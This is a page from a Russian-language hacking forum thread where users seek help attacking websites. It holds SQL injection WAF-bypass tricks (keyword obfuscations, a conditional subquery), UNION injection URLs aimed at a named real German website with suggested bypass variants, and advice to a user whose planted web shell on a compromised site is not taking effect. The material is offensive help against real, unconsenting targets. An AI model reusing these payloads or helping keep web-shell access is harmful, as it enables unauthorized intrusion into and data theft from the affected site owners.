Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Prous

    Prous New Member

    Joined:
    10 May 2018
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте! Есть boolean blind sql иньекция,но WAF фильрует select и information_schema. Удалось вытащить версию mysql - 5.5.42
    Пробовал обходить(аналогично с information_schema):
    %53elect
    sel/**/ect
    SeLEcT
    sel+ect
    concat('sel', 'ect')
    URL encode тоже пробовал,но результата нет. Есть какие нибудь идеи?
     
  2. ms13

    ms13 Well-Known Member

    Joined:
    19 Jun 2015
    Messages:
    2,770
    Likes Received:
    13,917
    Reputations:
    116
  3. Prous

    Prous New Member

    Joined:
    10 May 2018
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    не работает. waf не modsecurity,другой самопис

    фильтр похоже по маске ищет select в запросе
    т.е даже так sdbdnbpselect не работает
     
    #2763 Prous, 21 Jan 2020
    Last edited: 21 Jan 2020
  4. ms13

    ms13 Well-Known Member

    Joined:
    19 Jun 2015
    Messages:
    2,770
    Likes Received:
    13,917
    Reputations:
    116
    ну прости, я ж не знал, шо всё так... :(
     
  5. Prous

    Prous New Member

    Joined:
    10 May 2018
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    по хедеру узнал что waf akamai
     
  6. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,563
    Reputations:
    40
    Молодец
     
  7. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,785
    Likes Received:
    399
    Reputations:
    230
    помогите ваф обойти
    Code:
    http://baustelle.viernheim.de/index.php?id=83&rt=single&typ=img&no_cache=1&uid=10+union+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+
     
  8. Pop-Xlop

    Pop-Xlop Member

    Joined:
    26 Aug 2019
    Messages:
    20
    Likes Received:
    21
    Reputations:
    8
    Если только WAF беспокоит, то:
    Code:
    http://baustelle.viernheim.de/index.php?id=83&rt=single&typ=img&no_cache=1&uid=10+union+select(wafbypass),2,3,4,5,6,7,8,9,10,11,12,13,14+--+
    http://baustelle.viernheim.de/index.php?id=83&rt=single&typ=img&no_cache=1&uid=10+and+union+select,1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+
    
     
    DezMond™ likes this.
  9. hibar1Xs

    hibar1Xs Member

    Joined:
    30 Jan 2019
    Messages:
    15
    Likes Received:
    8
    Reputations:
    3
    Либо крутим подзапрос в uid. uid=(if((select 1),10,0)), либо другое значение искать...:)
     
    DezMond™ likes this.
  10. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,785
    Likes Received:
    399
    Reputations:
    230
    ну естественно синтаксис соблюдать, с ошибками он и так проходит
     
  11. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,563
    Reputations:
    40
    После + поставь select
     
  12. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,785
    Likes Received:
    399
    Reputations:
    230
    ваф срабатывает, по этому не полный запрос) при чём ваф работает когда запрос выполняется без ошибок, даже если в конце убрать --
     
  13. ci0b2n1feec

    ci0b2n1feec New Member

    Joined:
    4 Oct 2018
    Messages:
    50
    Likes Received:
    2
    Reputations:
    0
    dell
     
    #2773 ci0b2n1feec, 24 Jan 2020
    Last edited: 24 Jan 2020
  14. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    227
    Likes Received:
    89
    Reputations:
    7
    столкнулся с ситуацией, когда есть веб шелл, есть правки на файлы и правки вносятся. Но когда загружаешь страницу из http - правок, что внес - нет. так же и с файлами. Заливаешь текстовый файл, а при открытии - 404. Права стоят верные. Через веб шелл смотришь - файл есть.либо правки в существующих. А сайт работает как и работал.
    Что тут может быть?
     
  15. gena ryzhov

    gena ryzhov Member

    Joined:
    18 Dec 2013
    Messages:
    16
    Likes Received:
    7
    Reputations:
    0
    Файловый кеш сервера + метка модификации файла не меняется. Либо не на тот сервак правки вносите, такое тоже бывает)
     
    o314um likes this.
  16. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    227
    Likes Received:
    89
    Reputations:
    7
    метка модификации не меняется действительно. Как быть с файловым кешем?
     
  17. Pop-Xlop

    Pop-Xlop Member

    Joined:
    26 Aug 2019
    Messages:
    20
    Likes Received:
    21
    Reputations:
    8
    Уверены, что не балансер?
     
  18. kostea

    kostea New Member

    Joined:
    23 Dec 2015
    Messages:
    29
    Likes Received:
    0
    Reputations:
    0
  19. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,563
    Reputations:
    40
    Почему тогда у этих многих не спросить?
    Лично я не вижу там ничего
     
  20. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    227
    Likes Received:
    89
    Reputations:
    7
    Скорее всего кеш... И явно на том ИП все держится
    Есть ответы как с ним бороться, чтобы внести измененния?

    Очень похоже, что инъекции нету. Просто там делит на слова и делает поиск по словам и частям слов
     
Loading...